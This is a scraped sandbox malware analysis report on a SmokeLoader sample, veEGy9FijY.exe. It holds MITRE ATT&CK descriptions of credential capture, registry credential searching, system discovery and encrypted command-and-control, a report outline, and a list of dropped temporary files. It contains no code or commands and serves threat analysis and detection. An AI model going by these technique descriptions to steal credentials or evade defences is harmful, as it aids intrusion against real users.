Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report veEGy9FijY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\38E5.exe

C:\Users\user\AppData\Local\Temp\98CC.tmp

C:\Users\user\AppData\Local\Temp\98CC.tmp-shm

C:\Users\user\AppData\Local\Temp\9C29.tmp

C:\Users\user\AppData\Local\Temp\9E1F.tmp

C:\Users\user\AppData\Local\Temp\9EAC.tmp

C:\Users\user\AppData\Local\Temp\A024.tmp

C:\Users\user\AppData\Local\Temp\A0A2.tmp

C:\Users\user\AppData\Local\Temp\A120.tmp

C:\Users\user\AppData\Local\Temp\BC8F.exe

C:\Users\user\AppData\Roaming\ddcvief

Windows Analysis Report
veEGy9FijY.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre